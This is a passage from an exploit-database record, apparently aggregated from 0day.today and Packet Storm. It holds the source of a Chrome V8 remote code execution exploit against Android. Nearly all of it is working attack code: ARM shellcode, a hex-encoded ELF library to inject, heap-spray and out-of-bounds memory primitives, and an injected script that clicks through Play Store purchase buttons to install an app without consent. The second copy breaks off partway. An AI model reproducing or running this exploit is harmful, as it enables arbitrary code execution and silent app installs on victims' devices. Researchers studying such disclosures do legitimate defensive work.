0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];\r\nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000\";\r\nvar arrayBuffer = new ArrayBuffer(0x1000000);\r\nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1;\r\nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4);\r\nvar args_address = backingStoreAddress+1024;\r\nfunction write_shellcode(dlsym_addr,buffer){\r\n //ldr r0,[pc,4]//0xe59f0004 \r\n //ldr r1,[pc,4]//0xe59f1004\r\n //b shellcode;//0xea000001\r\n //dlopen_addr//array_buffer_address\r\n //dlsym_addr\r\n //shellcode\r\n //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];\r\n var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];\r\n for(var i=0;i<stub.length;i++){\r\n globaldv[buffer/4+i]=stub[i];\r\n }\r\n \r\n shellcode = shellcode.concat([0,0,0,0]);\r\n for(var i=0;i<shellcode.length/4>>>0;i++){\r\n // u8arr[i+4*stub.length]=shellcode[i];\r\n globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);\r\n }\r\n return stub.length*4+shellcode.length;\r\n}\r\n \r\nfunction xss_code(){\r\n //alert(navigator.userAgent);\r\n //alert(document.cookie);\r\n var i1=setInterval(function(){\r\n if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){\r\n console.log(\"wait load complete\");\r\n return;\r\n }\r\n clearInterval(i1);\r\n var i2=setInterval(function(){\r\n document.getElementsByClassName(\"price buy id-track-click\")[0].click();\r\n var installButton = document.getElementById(\"purchase-ok-button\");\r\n if(installButton == null)\r\n return;\r\n installButton.click();\r\n document.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\");\r\n clearInterval(i2);\r\n setTimeout(function(){\r\n window.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\");\r\n },26000);\r\n },500);\r\n },500);\r\n}\r\n \r\nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\";\r\n//var backup_arr = backup_original_code(huge_func_code_entry);\r\nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);\r\nvar args_view = new DataView(arrayBuffer,1024,100);\r\nvar so_file_view = new DataView(arrayBuffer,4096);\r\nvar js_view = new DataView(arrayBuffer,0x100000);\r\nargs_view.setUint32(0,dlsym_addr+0xc,true);\r\nargs_view.setUint32(4,dlsym_addr,true);\r\nargs_view.setUint32(8,huge_func_code_entry,true);\r\nargs_view.setUint32(12,writed_len,true);\r\nargs_view.setUint32(16,backingStoreAddress+4096,true);\r\nargs_view.setUint32(20,so_str.length/2,true);\r\nargs_view.setUint32(24,backingStoreAddress+0x100000,true);\r\nargs_view.setUint32(28,js_str.length,true);\r\nprint(\"length is \"+so_str.length);\r\nfor(var i=0;i<so_str.length;i+=2){\r\n var value = so_str.substr(i,2);\r\n value = \"0x\"+value;\r\n so_file_view.setUint8(i/2,parseInt(value));\r\n}\r\nfor(var i=0;i<js_str.length;i++){\r\n js_view.setUint8(i,js_str.charCodeAt(i));\r\n}\r\n \r\nprint(\"begin execute shellcode\");\r\nhuge_func({});\r\n \r\nprint(\"done\");\r\npostMessage(true);\r\n//prevent arrayBuffer to be released\r\nwhile(1){}\r\n \r\n}\r\n//main world\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");\r\n}\r\n \r\n// Build a worker from an anonymous function body\r\nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );\r\n \r\nvar worker;\r\nvar exploitSucc = false;\r\nvar count = 0;\r\nfunction startExploit(){\r\n print(\"worker thread is started\");\r\n worker = new Worker( blobURL );\r\n count++;\r\n worker.onmessage = function(e){\r\n print(\"exploit result is \"+e.data);\r\n exploitSucc = e.data;\r\n if(exploitSucc==false){\r\n startExploit();\r\n return;\r\n }\r\n var end = +new Date();\r\n print(\"time diff is \"+(end-begin)/1000);\r\n //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';\r\n top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';\r\n }\r\n}\r\nvar begin = +new Date();\r\nstartExploit();\r\n \r\nvar savedCount = 0;\r\nvar hangMonitor = setInterval(function (){\r\n if(exploitSucc==true){\r\n clearInterval(hangMonitor);\r\n }else{\r\n if(savedCount==count){//maybe hang\r\n print(\"worker maybe hange\");\r\n worker.terminate();\r\n startExploit();\r\n }else{\r\n print(\"worker is normal\");\r\n savedCount = count;\r\n }\r\n }\r\n},10000);\r\n//URL.revokeObjectURL( blobURL );\r\n \r\n \r\n</script>\r\n</html>\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/27954", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2017-06-15T04:21:23", "bulletinFamily": "exploit", "description": "", "modified": "2017-06-14T00:00:00", "published": "2017-06-14T00:00:00", "href": "https://packetstormsecurity.com/files/142939/Google-Chrome-V8-Private-Property-Arbitrary-Code-Execution.html", "id": "PACKETSTORM:142939", "title": "Google Chrome V8 Private Property Arbitrary Code Execution", "type": "packetstorm", "sourceData": "`<html> \n// Source: https://github.com/secmob/pwnfest2016/ \n<script> \nfunction exploit(){ \n \nfunction to_hex(num){ \nreturn (num>>>0).toString(16); \n} \nfunction intarray_to_double(int_arr){ \nvar uBuf = new Uint32Array(2); \nvar dBuf = new Float64Array(uBuf.buffer); \nuBuf[0]=int_arr[0]; \nuBuf[1]=int_arr[1]; \nreturn dBuf[0]; \n} \n \nfunction str_to_double(str){//leng of str must be 8 \nvar dBuf = new Float64Array(1); \nvar u8Buf = new Uint8Array(dBuf.buffer); \nfor(var i=0;i<str.length;i++){ \nu8Buf[i] = str.charCodeAt(i); \n} \nreturn dBuf[0]; \n} \nfunction double_to_array(value){ \nvar uBuf = new Uint32Array(2); \nvar dBuf = new Float64Array(uBuf.buffer); \ndBuf[0]=value; \nreturn uBuf; \n} \n \nfunction gc(){ \nfor(var i=0;i<0x100000/16;i++){ \nnew String; \n} \n} \nfunction getHiddenValue(){ \nvar obj = {}; \nvar oob = \"/re/\"; \n//oob = oob.replace(\"re\",\"*\".repeat(0x2000)); \noob = oob.replace(\"re\",\"*\".repeat(0x100000)); \nvar str = 'class x extends Array{'+oob+\"}\"; \nvar fun = eval(str); \nObject.assign(obj,fun); \nreturn obj; \n} \nvar obWin; \nfunction makeOobString(){ \nvar hiddenValue = getHiddenValue(); \nvar magicStr = \"bbbb\"; \nvar arr=[]; \nvar str = 'class x extends Array{}'; \nfor(var i=0;i<str.length;i++){ \narr[i]=str.charCodeAt(i); \n} \nvar ob = new Array(0x200); \nob.fill(0x31313131); \ngc(); \ngc(); \nstr=String.fromCharCode.apply(null,arr); \nob=ob.concat(0x32323232); \nvar fun = eval(str); \nob[2]=str; \nob[3]=ob; \nObject.assign(fun,hiddenValue); \nvar oobString = fun.toString(); \ngc(); \ngc(); \nprint(\"begin search\"); \nvar subStr = oobString.substr(0,0x8000); \nvar pos = subStr.indexOf(magicStr); \nprint(\"end search\"); \nif(pos==-1){ \nprint(\"find magic failed\"); \npostMessage(false); \nself.close(); \nprint(\"unpossible\"); \nthrow \"error\"; \n}else{ \nprint(\"find magic at \"+pos); \n \n} \noobString = oobString.substr(pos,ob.length*4); \nobWin=ob; \nreturn oobString; \n} \nvar oobString = makeOobString(); \nprint(\"get oob string successfully\"); \nfunction print(){ \nconsole.log.apply(null,arguments); \n/*document.write('<p >'); \ndocument.write.apply(document,arguments); \ndocument.write(\"<p>\");*/ \n} \nfunction str2arr(str,len){//len must be multile of 4 \nif(len===undefined) \nlen = str.length; \nvar u8a = new Uint8Array(len); \nfor(var i=0;i<len;i++){ \nu8a[i] = str.charCodeAt(i); \n} \nreturn new Uint32Array(u8a.buffer); \n} \nfunction pArrayInHex(arr){ \nvar result=\"<p style='font-size:8px'>\"; \nfor(var i=0;i<arr.length;i++){ \nresult+=(arr[i]+0x100000000).toString(16).substr(-8); \nresult+=\" \"; \nif(i%8==7) \nresult+=\"<p style='font-size:8px'>\"; \n} \nresult+=\"<p>\"; \nprint(result); \n//alert(result); \nreturn result; \n} \nfunction pStrInHex(str){ \n//var result=\"<p style='font-size:8px'>\"; \nvar result=\"\\n\"; \nfor(var i=0;i<str.length;i++){ \nvar code = str.charCodeAt(i); \nresult+=(code+0x100).toString(16).substr(-2); \nif(i%4==3) \nresult+=\" \"; \nif(i%32==31) \n// result+=\"<p style='font-size:8px'>\"; \nresult+=\"\\n\"; \n} \n// result+=\"<p>\"; \nresult+=\"\\n\"; \nprint(result); \nreturn result; \n} \nfunction getObjAddr(obj){ \nobWin[0]=obj; \nvar value2= ((str2arr(oobString,4))[0]); \nreturn value2>>>0; \n} \n \nvar getObj24BitsAddr = function(){ \nvar smi=0; \nvar code = 0; \nvar i=0; \n//don't allocate heap object \nfunction getAddr(obj){ \nobWin[0]=obj; \nvalue=0; \ncode = 0; \ni=0; \nfor(i=2;i>=0;i--){ \ncode = oobString.charCodeAt(i); \nvalue = code+value*256; \n} \nreturn value; \n} \nreturn getAddr; \n}(); \n \n \nvar lengthInOldSpace = 0xfffffffc; \nvar abarr=new Array(800); \nfunction sprayVM(){ \nvar i=0; \nvar j=0; \ntry{ \nfor(i=0;i<20;i++){ \nvar u8 = new Uint8Array(0x10000000-0x500); \nabarr[i]=u8; \n} \n}catch(e){} \ntry{ \nfor(j=0;j<100;j++){ \nvar u8 = new Uint8Array(0x8000000-0x500); \nabarr[i+j]=u8; \n} \n}catch(e){} \nprint(\"allocate \"+i+\" 256M \"+j+\" 16M \") \nfunction getRandomInt(min, max) { \nmin = Math.ceil(min); \nmax = Math.floor(max); \nreturn Math.floor(Math.random() * (max - min)) + min; \n} \ndelete abarr[getRandomInt(0,i)]; \n} \n \n \nfunction getNewSpaceAddrs(){ \n/*var kMaxRegularHeapObjectSize =523776;// 507136; \nvar str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000); \nstr+=\"%\";*/ \nvar objsInNewSpace = new Array(80); \nfor(var i=0;i<objsInNewSpace.length;i++){ \n//var xx=escape(str); \nvar xx = new Array(0x70000/4); \nobjsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; \n//a1/2?newspaceae'c|>>aePS \nnew Uint8Array(0x100000-0x500); \nnew Uint8Array(0x100000-0x500); \n} \nfunction compareNumbers(a, b) { \nreturn a - b; \n} \nobjsInNewSpace = Array.from(new Set(objsInNewSpace)); \nobjsInNewSpace = objsInNewSpace.sort(compareNumbers); \nreturn objsInNewSpace; \n} \n \n \nprint(\"begin get new space address\"); \nvar objsInNewSpace = getNewSpaceAddrs(); \nwhile(objsInNewSpace.length<16){ \nobjsInNewSpace = getNewSpaceAddrs(); \nprint(\"new space addresses\"); \npArrayInHex(objsInNewSpace); \n} \n \ntry{ \nsprayVM(); \n}catch(e){} \n \nvar selectedTrunk = 0; \nvar selectedStr = \"\"; \nfunction bruteForceFengShui(){ \nvar huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000 \nhuge_str +=\"%\"; \nvar hold = new Array(100); \n//var holdaddress = new Array(100); \nfor(var i=0;;i++){ \nvar large = escape(huge_str); \nvar addr = getObjAddr(large); \n//console.log(addr.toString(16) + \" \"+i); \nif(i<hold.length){ \nhold[i]=large; \n//holdaddress[i]=addr; \n} \naddr=(addr&0xfff00000)>>>0; \naddr = addr-0x100000; \nif(objsInNewSpace.indexOf(addr)!=-1){ \nselectedTrunk = addr; \nselectedStr = large; \nabarr.fill(1); \nhold.fill(1); \n//holdaddress.fill(1); \nbreak; \n} \nif(i===150){ \n/*i=0; \nprint(\"tried 200 times\"); \nabarr.fill(1); \ntry{ \nsprayVM(); \n}catch(e){};*/ \npostMessage(false); \nclose(); \nthrow \"exceed limits\"; \n} \n} \n} \nbruteForceFengShui(); \n//to avoid allocate memory latter, initilize here \nvar nextTrunk = selectedTrunk + 0x100000; \n \n//caea,aeP3a$?a$?SSca-e->>aaa \nvar huge_str = \"eval('');\"; \n//8000a,e1/2a$?aa$?SSi1/4a$?aa$?SSa1/4a1/2?new_spaceaC/a$?SS \nfor(var i=0;i<8000;i++) huge_str += 'a.a;'; \nhuge_str += \"return 10;\"; \nvar huge_func = new Function('a',huge_str); \nhuge_func({}); \n \nfunction fillNewSpace(origObj){ \n//first object in new space at 0x8100, new spaces layout \n//0x40000 \n//0x37f00 \n//..... \n//0x40000 \nvar gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25 \nvar gap = gap+\"%\"; \n//flat gap \ngap.substr(0,100); \nvar fillstr = \"%20a\".repeat((0x40000-12)/4); \nfillstr = escape(fillstr); \nvar addr=0; \nfor(var i=0;i<0x100;i++){ \naddr = getObj24BitsAddr(origObj); \nif((addr&0xfffff)===0x8101) \norigObj=escape(gap); \nelse \norigObj=unescape(fillstr); \n} \n} \n \nfunction findNewSpace(){ \nvar kMaxRegularHeapObjectSize =523776;// 507136; \nvar str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000); \nstr+=\"%\"; \nfor(var i=0;;i++){ \nvar xx=escape(str); \nvar straddr = getObjAddr(xx); \naddr=(straddr&0xfff00000)>>>0; \nif(addr===selectedTrunk){ \nprint(\"good state \"+straddr.toString(16)); \nbreak; \n} \n} \n} \n \nfunction myencode(str){ \nvar arr = []; \nfor(var i=0;i<str.length;i++){ \nif(i%2==1) \narr.push(str.charCodeAt(i)); \nelse{ \narr.push(37);//% \nvar hexstr = 